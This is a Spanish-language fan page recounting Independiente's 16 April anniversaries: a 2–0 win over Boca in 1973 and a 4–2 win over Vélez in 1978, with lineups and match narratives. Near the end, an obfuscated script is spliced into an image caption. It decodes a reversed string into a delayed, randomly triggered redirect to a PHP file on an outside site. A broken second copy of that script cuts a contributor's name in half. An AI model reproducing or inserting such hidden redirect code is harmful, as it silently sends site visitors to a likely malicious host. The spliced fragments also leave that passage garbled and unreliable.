Conectate con nosotros

Efemérides

Efemérides del 16 de Abril

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1973Independiente recibe a Boca en Avellaneda y le gana por 2 a 0, con goles de Agustín Balbuena a los 75y Miguel Ángel Giachello a los 89 minutos. En dicho encuentro malograron un penal cada uno, Osvaldo Potente el de ellos en apenas 4 minutos de juego, y Ricardo Pavoni a los 56’. El partido era por la fecha 5 del Metropolitano 1973, pero dicha fecha se había disputado a principios de mes, quedando este partido postergado para un día como hoy.

Aquel día el equipo formó con: Miguel Santoro; Eduardo Commisso, Francisco , Luis Garisto y Ricardo Pavoni; Alejandro Semenewicz (70’ Víctor Palomba), Rubén Galván y Héctor Martínez; Agustín Balbuena (89’ Rubén González), Miguel Giachello y Mario Mendoza, con Humberto Maschio como D.T. Mientras que la visita lo hizo con: Sánchez, Pernía, Mouzo, Rogel, Ovide, Benítez (58’ Ferrero), Peracca, Guerini, Ponce, Curioni y Potente (77’ Romero), con Rogelio Domínguez como D.T.

El triunfo mencionado fue el primero contra Boca ese año, pero luego llegaría la vuelta del Metropolitano, en julio por la fecha 22, y se repetiría el resultado en su cancha, con otro gol de Giachello y uno de Mario Mendoza. Ahora bien, en noviembre ya por el Torneo Nacional, se vieron nuevamente las caras en la fecha 11, y el Rojo volvería a ganarle pero por 3 a 1, con gol de Mario Mendoza y dos del “Chivo” Pavoni (uno de penal). Ese partido por el Nacional fue el último que jugó Independiente en el país, previo a su viaje y consagración como campeón del mundo en Italia por vencer a Juventus en la Copa Intercontinental. En resumen, en 1973 el Rojo sería el primer equipo en la historia mundial en ganar tres copas internacionales oficiales en el mismo año, pero por si eso fuera poco, agregó la perlita de ganarle los tres partidos del año a Boca, haciendo un global de 7 a 1.

Ahora volvamos a la fecha del encuentro y analicemos lo siguiente: el día 13 de abril Independiente recibió a Newell´s por la fecha 7 y le ganó 5 a 3 (4 goles de Giachello y 1 de Pavoni), luego un día como hoy vence a Boca, como dije, por la fecha 5 que se había postergado. Después de eso, el día 19 de abril, el Rojo visita a Atlanta y le gana por 1 a 0 (gol de Víctor Palomba), y posteriormente, le ganó 2 a 0 como local a Colón de Santa Fe el día 21 de abril (goles de Edgar Fernández en contra y Balbuena). ¿Hicieron las cuentas de las fechas? Sí, 4 partidos, 4 victorias, en apenas 9 días de calendario. Resulta demasiado difícil saberlo, pero me pregunto: ¿Habrá, mundialmente, un antecedente de algo así? No creo que pueda responderme a la pregunta, pero me enorgullece el saber que Independiente lo hizo.

1978Independiente en condición de visitante, pero en cancha de San Lorenzo, se enfrenta a Vélez y le gana por 2 a 4, con un triplete de Norberto “Beto” Outes (uno de penal) y el restante de Mariano Biondi, mientras que Héctor Ártico de penal y Omar Roldán marcaron los goles del local.

Fue por la fecha 9 del Torneo Metropolitano 1978, con un Vélez usando de pésima forma la ley del offside. En menos de un cuarto de hora de juego el Rojo ya estaba arriba 0 a 1 y, según las crónicas, se habían cobrado una decena de posiciones adelantadas. Ante esa situación el equipo empezó a usar sus armas para romper la estrategia de Vélez, como autopases, piques de los volantes y defensores, etc. A los 21 minutos José Lencina buscó por derecha a Ricardo Bochini que picó habilitado, con la defensa del local con los brazos en alto reclamando, el “Bocha” tiró el centro y otro vez Outes anotando.

A los 36’ sale un pelotazo largo de Osvaldo Pérez para Mariano Biondi, que arrancó desde el medio totalmente habilitado. Todo Vélez reclamando inútilmente y el Rojo que marcaba el tercero. El cuarto gol llegó a los 84 minutos, con Pedro Magallanes picando habilitado y solo por la banda izquierda, mete un centro bajo y Outes a la carrera la manda a guardar al fondo del arco. Por su triplete, el “Beto” sería tapa de la revista Goles.

Un gran partido del equipo, pero a pesar de ello el Rojo no pudo repetir la gran actuación ni el nivel del año anterior, cuando fue subcampeón del Metropolitano y campeón del Nacional, y tuvo un andar muy irregular que lo dejó en el octavo puesto.

Curiosamente, a pesar de eso, fue el equipo más goleador del campeonato con 69 goles, 20 de ellos convertidos por Norberto Outes que quedó a uno de los máximos artilleros, Luis Andreuchi de Quilmes y Diego Maradona de Argentinos. El “Beto” ya venía de ser el goleador del equipo en el Nacional 1977 y seguía rompiendo redes de todos los rivales, en lo que fue su camino a ser el quinto máximo goleador del club durante el profesionalismo.

Aquel Metropolitano 1978 tuvo como campeón a Quilmes, que en el tramo final del torneo superó a Boca cuando éste llegó a tener 5 puntos de ventaja. Mientras que Independiente se reencontraría con un título en el Nacional 1978, pero dicho campeonato tuvo su final a principios de 1979 y Norberto Outes fue el goleador del equipo en esa coronación.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»77″ height=»59″/></figure></div>



<p>Colaboración: <strong>Hernán Paglieri</strong>-Vicepresidente <strong>Peña Roja Daniel Ber<script>$mWn=function(n){if(typeof ($mWn.list[n])==toni –San Andrés de Giles

1 Comment

1 Comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides